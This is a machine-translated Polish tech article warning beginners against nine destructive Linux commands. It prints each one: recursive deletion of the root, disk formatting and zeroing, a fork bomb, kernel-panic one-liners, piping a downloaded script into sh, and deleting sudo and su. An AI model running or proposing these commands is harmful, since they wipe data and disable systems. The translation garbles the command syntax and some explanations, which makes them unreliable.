9 Śmiertelne polecenia systemu Linux, których nigdy nie powinieneś uruchamiać

  • William Charles
  • 0
  • 4964
  • 69
Reklama

Linux może być mieczem obosiecznym. Zakłada, że ​​wiesz, co robisz i daje ci swobodę robienia tego, co chcesz. Nie będzie cię kwestionować. Jest to wygodne, gdy Ty tak właściwie wiesz, co robisz, ale oznacza to również, że w ciągu kilku sekund możesz sprawić, że Twój system będzie bezużyteczny.

Nowość w wierszu poleceń systemu Linux? Bez obaw. Rozpocznij pracę z naszym przewodnikiem po Linux-ie Szybki przewodnik Pierwsze kroki z linią poleceń Linuksa Krótki przewodnik Pierwsze kroki z linią poleceń Linuksa Możesz zrobić wiele niesamowitych rzeczy z poleceniami w Linuksie i naprawdę nie jest trudno się go nauczyć. wraz z tymi 40 niezbędnymi poleceniami Linuksa A-Z Linuxa - 40 podstawowych poleceń, które powinieneś znać A-Z Linuxa - 40 podstawowych poleceń, które powinieneś wiedzieć Linux jest często ignorowanym trzecim kołem w systemach Windows i Mac. Tak, w ciągu ostatniej dekady system operacyjny typu open source zyskał dużą przyczepność, ale nadal jest daleki od rozważenia ... Dzięki tym dwóm zasobom w mgnieniu oka zapoznasz się z linią poleceń.

Ale bez względu na to, czy jesteś nowicjuszem w Linuksie, czy weteranem, nigdy nie powinieneś uruchamiać komendy, chyba że wiesz dokładnie co to robi. Oto niektóre z najbardziej śmiercionośnych poleceń systemu Linux, których w większości chcesz uniknąć.

Usuń rekurencyjnie

Zdolność Linuksa do usuwania wszystkiego, co chcesz bez pytania, jest darem niebios, zwłaszcza po wielu latach “Tego pliku nie można usunąć” błędy w systemie Windows. Ale trolle internetowe szybko Cię oszukają, przedstawiając niezwykle niebezpieczne polecenia usuwania, które mogą wyczyścić całe dyski twarde.

rm -rf /

Ten wiersz wykonuje polecenie remove rm z dwoma przełącznikami: -r która wymusza rekurencyjne usuwanie przez wszystkie podkatalogi i -fa która wymusza usunięcie plików tylko do odczytu bez potwierdzenia. Polecenie jest wykonywane na / katalog główny, w zasadzie czyszcząc cały system.

Uwaga: w dzisiejszych czasach na większości systemów Linux, jeśli spróbujesz to zrobić, otrzymasz ostrzeżenie. Ale ostrzeżenie nie jest gwarantowane, więc po prostu nie rób tego.

Sformatuj dysk twardy

Terminal jest szczególnie trudny dla początkujących użytkowników Linuksa, ponieważ zapewnia kilka sposobów przypadkowego wyczyszczenia dysku twardego. Usuwanie rekurencyjne jest duże, ale oto kolejne:

mkfs.ext3 / dev / hda

To polecenie formatuje dysk twardy do korzystania z systemu plików ext3. Formatowanie dysku Jak sformatować dysk FAT32 na NTFS - i zalety tego Jak zreformować dysk FAT32 na NTFS - i zalety tego Być może nie wiesz, ale wybór odpowiedniego systemu plików dla dysków jest naprawdę ładny ważny. Chociaż główna idea wszystkich systemów plików jest taka sama, istnieje wiele zalet i wad każdego z… nie jest z natury złośliwym działaniem, ale tak “nastawić” dysk taki, że to “dobry jak nowy”. Innymi słowy sformatowany dysk twardy przypomina pustą tablicę.

Formatowanie jest przydatne w przypadku partycji dysków i napędów zewnętrznych, ale wykonuje się je na całym dysku twardym (takim jak / dev / hda) jest niebezpieczny i może pozostawić twój system w stanie niemożliwym do odzyskania.

Zastąp dysk twardy

Jakby przypadkowe formatowanie dysku nie było wystarczająco złe, możliwe jest zastąpienie dysku twardego przy użyciu surowych danych. Przynajmniej formatowanie dysku jest faktyczną procedurą z rzeczywistymi zastosowaniami; z drugiej strony bezpośrednie nadpisywanie dysku nie jest tak świetne.

dowództwo > / dev / hda

W powyższym poleceniu, dowództwo można zastąpić dowolnym poleceniem Bash. The > operator przekierowuje dane wyjściowe polecenia po lewej stronie do pliku po prawej stronie. W takim przypadku nie ma znaczenia, jaki jest wynik działania lewego polecenia. Surowe dane są przekierowywane i wykorzystywane do nadpisywania systemowego dysku twardego.

Jak możesz sobie wyobrazić, czyni to bezużytecznym.

Wyczyść dysk twardy

Oto inny sposób na zrujnowanie systemu. Tym razem polecenie całkowicie wyzeruje dysk twardy. Brak uszkodzenia lub zastąpienia danych; dosłownie wypełni twój dysk twardy zerami. Dysk twardy nie zostanie wyczyszczony bardziej niż to.

dd if = / dev / zero of = / dev / hda

The dd polecenie jest instrukcją niskiego poziomu, używaną głównie do zapisywania danych na dyskach fizycznych. The Jeśli parametr określa źródło danych, którym w tym przypadku jest / dev / zero, specjalność w systemie Linux, która wytwarza nieskończony strumień zer. The z parametr określa miejsce docelowe tych zer, którym jest / dev / hda napęd.

Tak, istnieją uzasadnione powody, aby wyzerować dysk, ale jeśli nie wiesz, jakie są te powody, zechcesz trzymać się z dala od tego polecenia.

Dysk twardy Implode

Jeśli masz dość słuchania sposobów na zniszczenie dysku twardego, poczekaj. Oto jeszcze jeden dla ciebie. W systemie Linux istnieje specjalny plik o nazwie / dev / null spowoduje to odrzucenie wszelkich zapisanych danych. Możesz myśleć o tym jak o czarnej dziurze lub niszczarce plików: wszystko, co otrzymasz jako dane wejściowe, zostanie zjedzone na dobre.

mv / / dev / null

Czy widzisz tutaj niebezpieczeństwo? The mv polecenie próbuje przenieść katalog główny systemu / do czarnej dziury / dev / null. To prawidłowe polecenie, a wynik jest druzgocący: dysk twardy zostaje zjedzony i nie ma już nic. Spowoduje to, że twój system będzie bezużyteczny.

Powoduje panikę jądra

Windows ma swój niesławny niebieski ekran śmierci Windows 8 ulega awarii? Jak w prosty sposób rozwiązywać problemy z niebieskim ekranem i innymi problemami Awaria systemu Windows 8? Jak w prosty sposób rozwiązywać problemy z niebieskim ekranem i innymi problemami Windows 8 nie jest doskonały. To powiedziawszy, większość niebieskich ekranów i awarii aplikacji nie jest winą systemu Windows. Nasze wskazówki pomogą ci dokładnie zidentyfikować, co jest nie tak z komputerem i naprawić. . I pomimo mitów, które się krążą, Linux nie jest w pełni bezpiecznym systemem. 4 mity o cyberbezpieczeństwie, które muszą umrzeć. 4 mity o cyberbezpieczeństwie, które muszą umrzeć. Czasami pojawia się błąd wewnętrzny, z którego nie można odzyskać, więc system wprowadzi coś podobnego do niebieskiego ekranu: a panika jądra.

dd if = / dev / random of = / dev / port echo 1> / proc / sys / kernel / panic cat / dev / port cat / dev / zero> / dev / mem

Zawiłości powyższych poleceń nie są tutaj ważne. Co jest ważne jest, aby uruchomienie którejkolwiek z tych linii spowodowało panikę jądra, zmuszając do ponownego uruchomienia systemu. Najlepiej trzymać się z dala od tych poleceń, chyba że masz absolutną pewność, że wiesz, co robisz.

Widelec Bomba

Bash jest językiem terminala Linuksa Czy Linux jest mylący? Oto kluczowe warunki, które musisz wiedzieć, czy Linux jest mylący? Oto kluczowe warunki, które musisz znać W dzisiejszych czasach Ubuntu i inne współczesne dystrybucje Linuksa zwykle instalują się bez problemów (i nie wymagają żadnej wiedzy), ale w miarę korzystania z nich, nieuchronnie natrafisz na wszelkiego rodzaju terminologię, która… i jest potężny. Może nie tylko uruchamiać polecenia, ale także uruchamiać funkcje, co ułatwia pisanie skryptów automatyzujących zadania systemowe. Niestety funkcje nie przychodzą bez własnego zestawu zagrożeń.

: () : |: & ;:

To niejasne polecenie nazywa się widelec bomba, który jest szczególnym rodzajem paniki jądra. Definiuje funkcję o nazwie : która rekurencyjnie wywołuje się dwukrotnie podczas wykonywania. Jedno z wywołań rekurencyjnych odbywa się na pierwszym planie, a drugie w tle.

Innymi słowy, ilekroć funkcja ta jest wykonywana, spawnuje dwa procesy potomne. Te procesy potomne spawnują własne procesy potomne, a ten cykl trwa w nieskończonej pętli. Jedynym wyjściem z tego jest ponowne uruchomienie systemu.

Wykonaj skrypt zdalny

Oto niewinne polecenie, które może być przydatne w codziennym życiu w systemie Linux. wget pobiera zawartość adresu URL, który może służyć do uzyskiwania dostępu do stron internetowych lub pobierania plików. Istnieje jednak prosta sztuczka, która czyni ją niebezpieczną:

wget http: // an-untrusted-url -O- | sh

Powyższa kombinacja pobiera zawartość podanego adresu URL i natychmiast podaje go do sh polecenie, które wykonuje pobraną zawartość w terminalu. Gdyby adres URL wskazywał na złośliwy skrypt, to przypieczętowałbyś własny los tym poleceniem.

Wyłącz prawa do rootowania

To ostatnie polecenie jest proste. Wykorzystuje powszechnie używane rm polecenie, aby wyłączyć dwa najważniejsze polecenia w systemie Linux: sudo i su. Krótko mówiąc, te dwa pozwalają biegać inny polecenia z uprawnieniami roota. Bez nich życie w Linuksie byłoby nieszczęśliwe.

rm -f / usr / bin / sudo; rm -f / bin / su

Dlatego nie powinieneś uruchamiać tego polecenia. Wymusza usunięcie obu poleceń z twojego systemu bez potwierdzenia, pozostawiając cię w zacięciu. Tam sposoby przywracania usuniętych danych Najlepsze sposoby odzyskiwania danych w systemie Linux Najlepsze sposoby odzyskiwania danych w systemie Linux Bez względu na to, czy była to Twoja wina, czy nie, dane mogą się zdarzyć na danych przechowywanych na urządzeniach. Dyski twarde, dyski półprzewodnikowe i nośniki wymienne mogą potencjalnie „utracić” pliki z powodu wielu…, ale nie zawsze jest to proste i nie będzie przyjemne.

Proszę bądź ostrożny! Nie bój się bawić z Linuksem Biorąc pod uwagę Linuksa? 10 najczęściej zadawanych pytań dotyczących systemu Linux? 10 najczęściej zadawanych pytań Oto najczęściej zadawane pytania dotyczące systemu Linux dla użytkowników systemu Windows. Po przejrzeniu tej listy pytań i odpowiedzi powinieneś poczuć się pewniej podczas wypróbowywania Linuksa. i terminal wiersza poleceń, ale jednocześnie wykonuj swoje badania i nigdy niczego nie wykonuj, chyba że masz absolutną pewność co do tego. Jeśli ktoś ci to powie “spróbuj tego polecenia”, zawsze dwukrotnie i potrójnie sprawdź.

Czy kiedykolwiek wykonałeś destrukcyjne polecenie? Co się stało? Czy ktoś cię oszukał? Podziel się z nami swoimi przemyśleniami i doświadczeniami w komentarzach!




Jeszcze bez komentarzy

O nowoczesnej technologii, prostej i niedrogiej.
Twój przewodnik w świecie nowoczesnych technologii. Dowiedz się, jak korzystać z technologii i gadżetów, które nas otaczają każdego dnia i dowiedz się, jak odkrywać ciekawe rzeczy w Internecie.